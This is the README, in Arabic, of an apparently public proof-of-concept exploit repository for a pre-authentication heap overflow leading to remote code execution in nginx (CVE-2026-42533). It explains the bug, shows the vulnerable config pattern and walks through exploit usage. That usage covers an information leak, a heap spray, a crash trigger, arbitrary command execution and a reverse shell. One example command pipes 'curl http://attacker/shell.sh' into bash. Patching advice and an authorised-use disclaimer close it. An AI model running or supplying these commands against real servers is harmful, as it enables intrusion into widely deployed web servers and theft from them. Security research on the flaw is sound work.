
استغلال لثغرة تجاوز سعة المخزن المؤقت في كومة nginx (CVE-2026-42533) يتيح تنفيذ أوامر برمجية عن بُعد (RCE) قبل المصادقة عبر الكتابة فوق الالتقاط ثنائي المرور. يتضمن وحدات تسريب المعلومات، رش الكومة، والصدفة العكسية.
تنفيذ برمجي عن بُعد قبل المصادقة عبر إتلاف الالتقاط ثنائي المرور
تم إصدار PoC العام في 2026-07-27 — لا تنتظر، حدّث الآن.
| CVE | CVE-2026-42533 |
| CVSS 4.0 | 9.2 (حرجة) |
| النوع | تجاوز سعة المخزن المؤقت في الكومة (CWE-122) |
| الإصدارات المتأثرة | nginx 0.9.6 – 1.30.3 (مستقر)، 0.9.6 – 1.31.2 (النسخة الرئيسية) |
| الإصلاح | nginx 1.30.4 / 1.31.3, NGINX Plus R36 P7 / 37.0.3.1 |
| تاريخ الإفصاح | 2026-07-15 (F5 / NGINX) |
| تاريخ إصدار PoC | 2026-07-27 |
| الباحث | Stan Shaw (0xCyberstan) |
| المنصة | التشخيص | التجاوز | الانهيار | تسريب المعلومات |
|---|---|---|---|---|
| Ubuntu 24.04 x86_64 | ✅ | ✅ | ✅ SIGABRT | ⚠️ جزئي |
CVE-2026-42533 هي ثغرة حرجة لتجاوز سعة المخزن المؤقت في الكومة في محرك تقييم السلاسل ثنائي المرور في nginx. عندما تتفاعل توجيهات map المعتمدة على التعبيرات النمطية مع مجموعات الالتقاط المرقّمة ($1, $2, وغيرها)، تتم الكتابة فوق بنية r->captures المشتركة بصمت بين مرحلتي LEN (القياس) وVALUE (الكتابة). يؤدي هذا إلى عدم تطابق في الحجم:
عند ربط هاتين البدائيتين معًا، تمكنان من تنفيذ برمجي عن بُعد موثوق قبل المصادقة، متغلبين على ASLR — وتم إثبات ذلك بموثوقية 10/10 على Ubuntu 24.04.
┌─────────────────────────────────────────────────────────────┐
│ LEN PASS (measure) │
│ $1 from location ~ ^/api/(...)$ = "abc" → measures 3 bytes│
│ $overflow_gadget = giant_header → measures 5000 bytes │
│ Buffer allocated: 5003 bytes │
│ │
│ [ $overflow_gadget triggers map regex → clobbers $1 ] │
│ $1 now = giant_header (5000 bytes) │
│ │
│ VALUE PASS (write) │
│ $1 writes 5000 bytes (LEN said 3!) → OVERFLOW! │
│ $overflow_gadget writes 5000 bytes │
│ Total written: 10000 bytes into 5003-byte buffer │
│ → 4997 bytes overflow into adjacent heap │
└─────────────────────────────────────────────────────────────┘
يتسبب التجاوز في إفساد بنيات الكومة المجاورة. الهدف الأساسي هو ngx_pool_cleanup_t:
struct ngx_pool_cleanup_s {
ngx_pool_cleanup_pt handler; // function pointer → overwrite for RIP control
void *data; // argument to handler
ngx_pool_cleanup_t *next; // next in chain
};
عند تدمير تجمّع الاتصالات، يتم استدعاء handler(data) → تنفيذ تعليمات برمجية عشوائية.
CVE-2026-42533/
├── exploit/
│ ├── exploit.py # Full exploit chain (leak → spray → overflow → RCE)
│ ├── leak.py # Info leak module (heap/libc pointer leak)
│ ├── overflow.py # Heap overflow module (crash / RCE trigger)
│ ├── analyze.py # GDB analysis helper for offset determination
│ └── requirements.txt # Python dependencies
├── nginx/
│ └── nginx.conf # Vulnerable nginx configuration
├── Dockerfile # Docker build for test environment (Ubuntu 24.04)
├── docker-compose.yml # Docker Compose for easy deployment
└── README.md
requests# Diagnostic mode — shows two-pass mismatch (safe, no crash)
python3 exploit/overflow.py <target> --diagnose
المخرجات:
header= 10: LEN= 13 actual= 13 internal_overflow= 7 ✓
header= 100: LEN= 103 actual= 103 internal_overflow= 97 ✓
header= 1000: LEN= 1003 actual= 1003 internal_overflow= 997 ✓
python3 exploit/overflow.py <target> --crash
النتيجة على Ubuntu 24.04:
worker process 12282 exited on signal 6 (core dumped)
free(): invalid next size (normal)
# Ubuntu 24.04 (confirmed working)
ssh root@<your-server>
apt-get install -y build-essential libpcre2-dev libssl-dev zlib1g-dev
wget https://nginx.org/download/nginx-1.27.4.tar.gz
tar xzf nginx-1.27.4.tar.gz && cd nginx-1.27.4
./configure --prefix=/usr/local/nginx --with-cc-opt='-g -O0'
make -j$(nproc) && make install
# Copy vulnerable config
cp nginx/nginx.conf /usr/local/nginx/conf/nginx.conf
/usr/local/nginx/sbin/nginx
# Run exploit from your machine
python3 exploit/overflow.py <server-ip> --diagnose
docker compose up -d --build
python3 exploit/overflow.py localhost --port 8080 --diagnose
python3 exploit/exploit.py <target> [options]
# Examples:
python3 exploit/exploit.py 192.168.1.100 # full auto
python3 exploit/exploit.py 192.168.1.100 --leak-only # recon only
python3 exploit/exploit.py 192.168.1.100 --crash # verify vuln
python3 exploit/exploit.py 192.168.1.100 --cmd "id > /tmp/pwned"
# Manual mode (if you have pre-leaked addresses)
python3 exploit/exploit.py 192.168.1.100 \
--libc 0x7f1234000000 \
--heap 0x5a1234000000 \
--cmd "curl http://attacker/shell.sh | bash"
# Reverse shell
python3 exploit/exploit.py 192.168.1.100 \
--reverse-shell --lhost 10.0.0.1 --lport 4444
python3 exploit/leak.py <target> [options]
# Quiet mode (just output addresses)
python3 exploit/leak.py 192.168.1.100 -q
# LIBC:0x7f1234567890
# HEAP:0x5a1234567890
python3 exploit/overflow.py <target> --crash # crash worker (PoC)
python3 exploit/overflow.py <target> --spray # heap spray only
يتطلب الاستغلال هذا النمط المحدد في إعداد nginx:
# 1. A regex-based map (clobbers capture state)
map $http_x_overflow $overflow_gadget {
"~^(.+)$" $1; # regex match overwrites $1
default "";
}
# 2. A regex location (creates captures)
server {
location ~ ^/api/(...)$ { # creates $1, $2, ...
# 3. Both capture AND map variable in same directive
return 200 "$1$overflow_gadget"; # ← two-pass sink
}
}
اكتشف الإعدادات القابلة للاستغلال باستخدام الماسح العام:
Worker PID: 12282
[Phase 1] Diagnostic:
header=100: LEN=103, response=103 ✓
header=1000: LEN=1003, response=1003 ✓ (997 byte internal overflow!)
[Phase 2] Heap Corruption:
8000-byte header → VALUE writes 16000 bytes into 8003-byte buffer
→ 7997 bytes overflow past buffer boundary
Worker PID: 12331 (NEW — old worker DEAD!)
Error log:
free(): invalid next size (normal)
worker process 12282 exited on signal 6 (core dumped)
# Upgrade to patched versions:
# nginx 1.30.4+ (stable) / 1.31.3+ (mainline)
# NGINX Plus R36 P7 / 37.0.3.1
استبدل الالتقاطات المرقّمة بـ التقاطات مُسمّاة في توجيهات map:
# VULNERABLE
map $http_foo $bar {
"~^(.+)$" $1; # numbered capture → clobbers shared state
}
# MITIGATED
map $http_foo $bar {
"~^(?<val>.+)$" $val; # named capture → isolated
}
nginx -v (يجب أن يكون ≥ 1.30.4 أو ≥ 1.31.3)تم إصدار إثبات المفهوم هذا لأغراض البحث الأمني والدفاع. استخدمه فقط ضد أنظمة تملكها أو لديك إذن صريح لاختبارها. تم إصلاح الثغرة — قم بالتحديث فورًا إذا لم تكن قد فعلت ذلك بالفعل.